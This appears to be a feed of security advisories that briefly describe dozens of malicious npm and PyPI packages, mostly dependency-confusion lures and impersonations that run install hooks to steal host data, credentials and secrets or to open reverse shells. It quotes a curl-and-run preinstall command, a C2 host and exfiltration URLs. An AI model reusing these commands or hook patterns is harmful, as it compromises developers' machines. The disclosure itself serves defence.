Malicious code in node-fetch-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78aef0d64a7d761d2987d27aea462083425e5692475cd81332b7a3152c754308 On Windows, scripts/postinstall.js XOR-decodes a hardcoded C2 host node22.lunes.host:3258, authenticates with a 5-minute rolling HMAC-SHA256 token,...

Malicious code in vitest-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...

Malicious code in zomato-espresso (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...

Malicious code in zomato-mcp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...

Malicious code in zomato-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5 package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...

Malicious code in sn-internal-testjgsakjdkjadkjah (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261 package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...

Malicious code in test-package-sajsdkashdj (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87 package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...

Malicious code in search-from-feed (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c9291507e6e48bff8b92fcd9dd1f51345077f59aae2692f3d7ca84a8c0581b04 [email protected] is a dependency-confusion attack package. package.json declares both preinstall and postinstall as node callback.js, so the...

Malicious code in gd-auth-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4de00613e21b42bf3c651995beae63ff9d85772b9370145152d172a062be4fb7 package.json declares preinstall: node index.js, which runs automatically on npm install. index.js requires os, dns, https, querystring, and the loca...

Malicious code in respects-switch (npm)

respects-switch is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.0.0, the canonical floating-version bait use...

Malicious code in onboarding-respects-modal (npm)

onboarding-respects-modal is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait use...

Malicious code in crud-respect (npm)

crud-respect is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait used to outrank ...

Malicious code in inversiones-common (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 347a767ebbbb5843e6b005c167d98c9ab7b3ea943fadd88401682f2a2b14b2a4 setup.py executes a beacon function at module top level before setup is called, so the payload fires automatically on pip install inversiones-common...

Malicious code in fork-angular-daterangepicker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d81ecc9a5b511f1d867597c3834e62c3c174209ba7718db45bf27af5d862d90f package.json declares a preinstall lifecycle hook "preinstall": "node index.js" that runs index.js on every npm install. index.js line 3 hardcodes...

Malicious code in hyperpure-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 1646c4910046d5c497ba97d75067f1b566f5bfe79ba938e0b9d06eda3b2eefa3 The OpenSSF Package Analysis project identified 'hyperpure-core' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in blinkit-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 304234c334dce7d26c040f318d608e24b53db9b0b7b0b27d3a6dd2c040481b15 The OpenSSF Package Analysis project identified 'blinkit-core' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in zomato-sushi (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c package.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname hostname -f, whoami, current...

Malicious code in zomato-logger (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3dccb8b8b32337c2a257a763c273e03367ec07c904b5db0c07dbf514d546709d On npm install, the package's preinstall lifecycle script in package.json runs curl to POST the installer's hostname, current user whoami, working...

Malicious code in zomato-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...

Malicious code in zomato-config (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3a1b48a397992964f8f3982dc69a33431bfb26c911c29a1e5d124581cef46a40 Dependency-confusion package targeting an internal Zomato namespace. The package ships only a stub index.js module.exports = name: 'zomato-config',...

Malicious code in jsonschema-viewer (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 76cad60a803b91e4da8eb438787ca5f044fd3deafedef5de1fdb4e92bd8fd9e1 Package configures an entry point command line that executes a remote script. It then downloads a next stage malware, which acts as next dropper for a fileless...

Malicious code in requests-enhancer (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62 Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHu...

Malicious code in sf-storybook (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 961d26175eb7b4d34d87e6cb162f4b9d5a9febcb520b24a4512406d492a829b5 The OpenSSF Package Analysis project identified 'sf-storybook' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...

Malicious code in d0rk3r (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 d0d4cf20ac250e3d7a23666cf8bc3ae722d555b982649dad3f615d9c7c8818d9 The package declares malicious dependencies. Their activity is however not triggered as since version 1.0.4, the packages releases lack any source code...

Malicious code in d0rk3r-telemetry (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 1f9f4d4943d02f9c78e513a75b4b0fcfd47d1e0486e79df9fe52f2112d840163 During import, package exfiltrates browsers data, SSH keys and other credential files, env variables and other sensitive data. --- Category: MALICIOUS - The...

Malicious code in request-cache-py (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector eafb96e46544cb1351d26caf52bff79055bc205a1f8454737b677fff8fbc6fea request-cache-py impersonates the legitimate requests-cache HTTP caching library. On import requestcachepy, the package's init.py starts a background...

Malicious code in free-anthropic-claude (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 11bfe96b56a6615a50639b25de793e14044ea393c2029b26fa4e1b9e3dc5a22f This package impersonates the Anthropic Claude SDK name and description claim to be an 'Official Anthropic Claude SDK wrapper', author is...

Malicious code in atlasora-config (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f33093da9f0bcf9358f3b00bd87e723d95267074539c72511ab58bff4172f092 The package declares a postinstall hook in package.json "postinstall": "node install.js" that auto-executes install.js on every npm install. install....

Malicious code in atlasora-shared (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e1bd49976f774ef8357d29c74bc366b851e69a611cc5894f1a59621d91f9daba package.json declares "postinstall": "node install.js", causing install.js to run automatically on npm install. install.js requires https, fs, os, an...

Malicious code in atlasora-api (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9776899942c749b493911ca4e33c3b4967308a816e167bd3ee90c95800632f92 Package declares a postinstall hook "postinstall": "node install.js" that runs install.js automatically on npm install. install.js imports https, fs,...

Malicious code in atlasora-types (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7af2118f668c8e39caf15aeb52d365083d5bc6b9c1ae4d9ff6d007d348ba8b9e On npm install, the package runs install.js via the postinstall lifecycle hook. The script harvests installer-side secrets and POSTs them as JSON to ...

Malicious code in atlasora-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cc75492c0a0ce4090918bfdef0cea9cc028ef4c8273283d32085189e13a59c51 Package ships a postinstall hook package.json scripts.postinstall: node install.js that runs automatically on every npm install. install.js reads...

Malicious code in atlasora-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cf7c54cd0923afe13aadf778a5c213363c521e7a50c4b9e235bf6c7cf58a973d On npm install, the package's postinstall hook node install.js, declared in package.json harvests secrets from the installer's machine and POSTs them...

Malicious code in atlasora-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fbd4392d81da887d2d7da24519df3a7d9341ee45e1fc091a724c4f5ede766ae5 package.json declares "postinstall": "node install.js", which runs automatically on npm install. install.js requires https, fs, os, and childprocess;...

Malicious code in @withgoogle/stitch-sdk (npm)

@withgoogle/stitch-sdk is a scope-squatting package on npm that impersonates Google's Stitch AI design tool SDK. The attacker registered the @withgoogle scope to mimic Google's withgoogle.com domain and published versions 0.1.1 and 0.1.2 under the account maximus-mcmillan on June 19, 2026. The...

Malicious code in query-profile (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 9a60c7fce9ec29fa327128c80bca74a51b9f1965c50c6dc9286016fa31001bf1 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

Malicious code in yian666aikf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f96776bdaabacae768376d5c1ff3543f77d94b41298d3d01365032817c3cd53e [email protected] advertises itself as a lightweight string-manipulation utility library, but its only on-install effect is to launch a reverse shell...

Malicious code in yianzzkf6687 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9 On npm install, the postinstall hook scripts/postinstall.js detach-spawns scripts/shell.js with detached: true, stdio: 'ignore', windowsHide: true an...

Malicious code in fluent-dashboard-panel-metrics (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9e745c609fb43daaa93911ae2edcb05b1ffd3cec1c6ec55c321597e9e39eb153 fluentpanelmetrics/init.py defines an undocumented function bootstrapruntimeprofile and invokes it unconditionally at module top level. The function...

Malicious code in improvado-layout-panel-metrics (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 61cc6b0b5d5efe4675f4159e8bc8f6380970614c1dc36b553207fa73fa66104e The package's top-level fluentpanelmetrics/init.py defines bootstrapruntimeprofile and unconditionally invokes it at import. The function opens a TCP...

Malicious code in django-auth-middleware-plus (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6cf58978ba5eec5220b4b4d85966efff31d31d164ff103f98dfd627381e061ec On import, djangoauthmiddlewareplus/init.py spawns a daemon thread that POSTs a JSON payload containing the host's hostname, username, cwd, environme...

Malicious code in free-claude (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware dbcf53e9c254b18b24a10378af086468449a29be879ee1e5c8e360a194b09a41 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in base_parts_ai (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219 When a user runs the package's jcc or jcx CLI, lib/aiutils.js polls https://jai.jaskle.cn/hm/hmpub/aicccfg for a newVer value and, if it differs from...

Malicious code in routecraft (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a0c4f17a9e94ab9fdbab7325f597551a6c0ba5b9e210cb0b7e28d3b86b4766d0 [email protected] ships verbatim Express.js source lib/routecraft.js, lib/application.js, lib/request.js, lib/response.js, lib/utils.js, lib/view.js —...

Malicious code in aikaf668897 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 450730a92143c06530923dacda588a17252ebc7edc9ddf71ff520446de5a3293 On npm install, the package's postinstall hook node scripts/postinstall.js spawns a detached background Node process running scripts/shell.js with...

Malicious code in aikaf6688812 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fcdebe342ec1c629835301869934fab1a4800c98116a337ec33b05def92d33e7 package.json declares a postinstall hook that runs scripts/postinstall.js, which spawns scripts/shell.js as a detached, stdio-ignored background...

Malicious code in aikaf788812 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c91950cef6a5f877a4a9bca074501e4c910dc50008d4c8c2623ddc21f08e31f2 Package masquerades as a string-utility library but ships a postinstall backdoor. On npm install, scripts/postinstall.js spawns scripts/shell.js as a...

Malicious code in create-mono-package (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 85402ef2db7bfd9e2bb01034a533e52649cf6058cc1e824e9c273aee5ae8121d The package's postinstall hook .prepare.cjs collects host fingerprint data os.hostname, os.userInfo.username, platform/arch, all non-internal network...

Malicious code in @chunklab/hexparse (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56ad779454aa221e4a3d5a13725428059b40edd7cd8a4329ef382348bc493013 Package advertises itself as a small hex/base64/endianness codec library, but every exported encode/decode function encodeHex, decodeHex,...

Malicious code in @bytemend/mfebus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b3d53776853d18aabf967b0f1882eb45f2164feedd600eeccc927f496002f5e4 The package advertises itself as a small in-memory pubsub library but its main entry dist/index.js eagerly requires dist/bootstrap.js, a 277KB...